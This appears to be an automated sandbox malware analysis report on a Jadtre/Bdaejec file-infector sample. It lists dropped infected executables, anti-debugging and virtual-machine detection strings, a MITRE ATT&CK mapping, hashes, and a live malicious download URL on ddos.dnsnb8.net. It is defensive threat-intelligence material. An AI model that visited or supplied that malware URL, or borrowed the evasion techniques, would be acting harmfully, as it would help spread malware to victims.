Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_1-1059

Source: C:\Users\user\Desktop\gT6IitwToH.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_0-7016

Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe

Code function: 1_2_00251718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00251754h

1_2_00251718

Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe

Code function: 1_2_002529E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

1_2_002529E2

Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe

Code function: 1_2_00252B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_00252B8C

Source: Amcache.hve.1.dr	Binary or memory string: VMware
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.1.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.1.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.1.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: IivJTsFD.exe, 00000001.00000003.1673168646.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000002.1948509714.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000003.1673168646.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000002.1948509714.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.1.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.1.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.1.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.1.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.1.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.1.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.1.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe

API call chain: ExitProcess graph end node

graph_1-1033

Source: C:\Users\user\Desktop\gT6IitwToH.exe

Code function: 0_2_00401EE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00401EE2

Source: C:\Users\user\Desktop\gT6IitwToH.exe

0_2_00409607

Source: C:\Users\user\Desktop\gT6IitwToH.exe

Code function: 0_2_00414044 mov eax, dword ptr fs:[00000030h]

0_2_00414044

Source: C:\Users\user\Desktop\gT6IitwToH.exe

Code function: 0_2_0040CD6B CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_0040CD6B

Source: C:\Users\user\Desktop\gT6IitwToH.exe	Code function: 0_2_00409867 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,	0_2_00409867
Source: C:\Users\user\Desktop\gT6IitwToH.exe	Code function: 0_2_00406000 SetUnhandledExceptionFilter,	0_2_00406000
Source: C:\Users\user\Desktop\gT6IitwToH.exe	Code function: 0_2_00401EE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00401EE2
Source: C:\Users\user\Desktop\gT6IitwToH.exe	Code function: 0_2_004035C0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_004035C0

Source: SciTE.exe.1.dr

Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Source: C:\Users\user\Desktop\gT6IitwToH.exe

Code function: GetLocaleInfoA,

0_2_0040A82A

Source: C:\Users\user\Desktop\gT6IitwToH.exe

Code function: 0_2_00406507 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00406507

Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe

Code function: 1_2_0025139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

1_2_0025139F

Source: Amcache.hve.1.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: IivJTsFD.exe PID: 4908, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: IivJTsFD.exe PID: 4908, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	11 Input Capture	11 System Time Discovery	1 Taint Shared Content	11 Input Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	3 Native API	Boot or Logon Initialization Scripts	2 Process Injection	1 Access Token Manipulation	LSASS Memory	131 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	2 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	13 System Information Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
gT6IitwToH.exe	89%	Virustotal		Browse
gT6IitwToH.exe	97%	ReversingLabs	Win32.Virus.Jadtre
gT6IitwToH.exe	100%	Avira	W32/Jadtre.B
gT6IitwToH.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	100%	Avira	TR/Dldr.Small.Z.haljq
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Jadtre.B
C:\Program Files\7-Zip\Uninstall.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Program Files\7-Zip\Uninstall.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	97%	ReversingLabs	Win32.Trojan.Skeeyah

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.rftp.comJosiah	0%	Avira URL Cloud	safe
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	0%	Avira URL Cloud	safe
http://www.activestate.com	0%	Avira URL Cloud	safe
http://www.scintilla.org/scite.rng	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rarN	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rar9	100%	Avira URL Cloud	malware
http://www.rftp.com	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net/?ll	100%	Avira URL Cloud	malware
http://www.activestate.comHolger	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net/6lk	100%	Avira URL Cloud	malware
http://www.baanboard.comBrendon	0%	Avira URL Cloud	safe
https://www.smartsharesystems.com/	0%	Avira URL Cloud	safe
https://www.smartsharesystems.com/Morten	0%	Avira URL Cloud	safe
http://www.scintilla.org	0%	Avira URL Cloud	safe
http://www.spaceblue.comMathias	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rar	100%	Avira URL Cloud	malware
http://www.lua.org	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rarW	100%	Avira URL Cloud	malware
http://www.spaceblue.com	0%	Avira URL Cloud	safe
http://www.develop.com	0%	Avira URL Cloud	safe
http://www.baanboard.com	0%	Avira URL Cloud	safe
http://www.develop.comDeepak	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rarh	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rarcC:	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ddos.dnsnb8.net	44.221.84.105	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k1.rar	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.scintilla.org/scite.rng	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar9	IivJTsFD.exe, 00000001.00000002.1948509714.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.rftp.comJosiah	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.activestate.com	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net/?ll	IivJTsFD.exe, 00000001.00000003.1673168646.0000000000F31000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.activestate.comHolger	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	IivJTsFD.exe, 00000001.00000003.1653432103.00000000011E0000.00000004.00001000.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarN	IivJTsFD.exe, 00000001.00000003.1673168646.0000000000F31000.00000004.00000020.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000002.1948509714.0000000000F31000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.1.dr	false		high
http://www.rftp.com	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net/6lk	IivJTsFD.exe, 00000001.00000003.1673168646.0000000000F31000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.baanboard.comBrendon	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
https://www.smartsharesystems.com/	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.scintilla.org	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.spaceblue.comMathias	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
https://www.smartsharesystems.com/Morten	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.develop.com	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.lua.org	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarW	IivJTsFD.exe, 00000001.00000002.1948509714.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.spaceblue.com	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.baanboard.com	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.develop.comDeepak	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarh	IivJTsFD.exe, 00000001.00000002.1948793448.000000000130A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarcC:	IivJTsFD.exe, 00000001.00000003.1673168646.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
44.221.84.105	ddos.dnsnb8.net	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581652
Start date and time:	2024-12-28 12:23:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	gT6IitwToH.exe renamed because original name is a hash value
Original Sample Name:	8da10c130681fd03a6b64ad9a827a433.exe
Detection:	MAL
Classification:	mal100.spre.troj.evad.winEXE@5/11@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 20 Number of non-executed functions: 23
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29, 40.126.53.8, 4.175.87.197, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:24:25	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
44.221.84.105	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	saytjshyf.biz/xoqfqirqhp
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	npukfztj.biz/edmrjb
	http://setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.com	Get hash	malicious	Unknown	Browse	setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.com/favicon.ico
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	saytjshyf.biz/eglmpsrvxnyx
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	saytjshyf.biz/peioi
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	npukfztj.biz/cbecuogqej
	Ziraat_Swift.hta	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	saytjshyf.biz/bkq
	invoice_96.73.exe	Get hash	malicious	FormBook	Browse	jhvzpcfg.biz/tgcwttfqletfhyq
	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	hehckyov.biz/ircdert
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	hehckyov.biz/xc

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ddos.dnsnb8.net	#U65b0#U7248#U7f51#U5173.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse	44.221.84.105
	#U8865#U4e01#U6253#U5305.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse	44.221.84.105
	#U65b0#U7248#U7f51#U5173Srv.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse	44.221.84.105
	gE4NVCZDRk.exe	Get hash	malicious	Bdaejec, RunningRAT	Browse	44.221.84.105
	ib.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	1hdqYXYJkr.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	7Y18r(193).exe	Get hash	malicious	Bdaejec, Stealc	Browse	44.221.84.105
	BUG32.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	7Y18r(212).exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	a2mNMrPxow.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	SgMuuLxOCJ.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	TNyOrM6mIM.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	FIyDwZM4OR.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	ZFttiy4Tt8.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	e62iSl0abZ.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	HGFSqmKwd5.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	A3nofpjN9A.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	QMtCX5RLOP.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	j2nLC29vCy.exe	Get hash	malicious	LummaC	Browse	3.218.7.103

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\IivJTsFD.exe	#U65b0#U7248#U7f51#U5173.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse
	#U8865#U4e01#U6253#U5305.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse
	#U65b0#U7248#U7f51#U5173Srv.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse
	gE4NVCZDRk.exe	Get hash	malicious	Bdaejec, RunningRAT	Browse
	ib.exe	Get hash	malicious	Bdaejec	Browse
	SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Get hash	malicious	Bdaejec	Browse
	8VB4lVuZk3.exe	Get hash	malicious	Bdaejec	Browse
	biKy3nZEyJ.exe	Get hash	malicious	Bdaejec	Browse
	biKy3nZEyJ.exe	Get hash	malicious	Bdaejec	Browse
	#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe	Get hash	malicious	Bdaejec, Sality	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IivJTsFD.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.590296079331186
Encrypted:	false
SSDEEP:	384:1F3ScXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:a8QGPL4vzZq2o9W7GsxBbPr
MD5:	9A4236DD8391045D8E0870AC55B5196D
SHA1:	2B67524E9B6287F9D815870CBC567382EDFD296E
SHA-256:	8A4D9F88C8BD997EC21C56516E5C8240331AF03A7FD2BD1E733556B3F3396944
SHA-512:	8D388AE7D4D352DF7205FB99CB53EE89285D605F02F212B4DF1F59CD06036EE4AD5EE0177D1084039778DCA37035D2CDC0EBB6FE470F48143DB89C50D6E6B03D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IivJTsFD.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2389504
Entropy (8bit):	6.731347158825253
Encrypted:	false
SSDEEP:	49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5:	9EF33468DC6B0452C1A805058B665505
SHA1:	74A3E5AEAADC0B91B6DF1DFE2F50856AFE8775D8
SHA-256:	B48613AF7959B5375DF9D0EBB4A6B62F1F8C8C1EACB96785D1F4C54975610BB4
SHA-512:	6D2EAD2F8C9D97F269C5F9862F8192B4A9E827BB7024F8D186312570A002794DE6C884915BBF08067EA938652F51360E3F602E4176B97610A1FC423819C7617D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IivJTsFD.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	6.3665208819231145
Encrypted:	false
SSDEEP:	768:uWQ3655Kv1X/qY1MSdaoQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdajGCq2iW7z
MD5:	276E8B5BA1C506406F19F82FF218408B
SHA1:	7C76E0619FE397B8BC77B9E0FFE8D3E7F086D7CC
SHA-256:	4F6F6AEB82D1D8F18655556CCA306F2E9C69003AB3279F5D6ECA4704F884145F
SHA-512:	67FDEF896B35869F0458619ECFDCE7D891ECB6557043ADFCEB48FD473D0CEDA80A389E9D082B5A128209970B69EE40D1D17BA461A6774A4BDDC3BC94425FC837
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_IivJTsFD.exe_af79706180d4dcdfa5c089843f806870fc326762_c85c8746_35fe4690-f685-45ef-bab5-6b0b774389cd\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9904703614805956
Encrypted:	false
SSDEEP:	192:D4lGL2n4MYm0z8b4j8/AmzuiFJZ24IO8QYd:2GLG4MYNz8b4jwzuiFJY4IO8QY
MD5:	9724B48FF54A4D1CA9646048AE121DE1
SHA1:	D8257D884B067814C50E32E1CAB5DA4A7515A7D6
SHA-256:	640852CB46D1B43EF3DB649D6616B001B0BB05D9BD637EB851579FCC61B1F5B0
